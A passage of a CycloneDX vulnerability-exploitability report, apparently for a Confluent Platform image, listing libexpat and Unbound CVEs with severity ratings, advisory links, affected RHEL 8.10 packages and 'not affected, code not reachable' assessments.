          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-32776",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.2,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        476
      ],
      "description": "libexpat before 2.7.5 allows a NULL pointer dereference with empty external parameter entity content.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-32776"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-32776"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-082556.html"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1158"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1159"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32776"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-32776"
        }
      ],
      "published": "2026-03-16T14:19:44+00:00",
      "updated": "2026-07-14T13:18:49+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.5.0-2.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-32777",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        }
      ],
      "cwes": [
        835
      ],
      "description": "libexpat before 2.7.5 allows an infinite loop while parsing DTD content.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-32777"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-32777"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-082556.html"
        },
        {
          "url": "https://github.com/libexpat/libexpat/issues/1161"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1159"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1162"
        },
        {
          "url": "https://issues.oss-fuzz.com/issues/486993411"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32777"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-32777"
        }
      ],
      "published": "2026-03-16T14:19:44+00:00",
      "updated": "2026-07-14T13:18:49+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.5.0-2.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-32778",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        476
      ],
      "description": "libexpat before 2.7.5 allows a NULL pointer dereference in the function setContext on retry after an earlier ouf-of-memory condition.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-32778"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-32778"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-082556.html"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1159"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1163"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32778"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-32778"
        }
      ],
      "published": "2026-03-16T14:19:44+00:00",
      "updated": "2026-07-14T13:18:49+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.5.0-2.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-32792",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        125,
        166
      ],
      "description": "NLnet Labs Unbound 1.6.2 up to and including version 1.25.0 has a denial of service vulnerability when compiled with DNSCrypt support ('--enable-dnscrypt'). A bad DNSCrypt query could underflow Unbound's DNSCrypt packet reading procedure that may lead to heap overflow. A malicious actor can exploit the vulnerability with a single bad DNSCrypt query that its decrypted plaintext consists entirely of '0x00' bytes and does not contain the expected '0x80' marker. Unbound would then start reading more bytes than necessary until it finds a non-'0x00' byte. Based on the underlying memory allocator and the memory layout, it could lead to heap overflow while reading followed by a crash. Likelihood of a crash is low, since it relies heavily on the underlying memory allocator and the memory layout. If the heap overflow does not happen, Unbound's later packet checks will deny the packet. Unbound 1.25.1 contains a patch with a fix to bound reading in the given buffer space.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-32792"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-32792"
        },
        {
          "url": "https://nlnetlabs.nl/news/2026/May/20/unbound-1.25.1-released/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32792"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8282-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-32792"
        },
        {
          "url": "https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-32792.txt"
        }
      ],
      "published": "2026-05-20T10:16:26+00:00",
      "updated": "2026-07-24T10:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
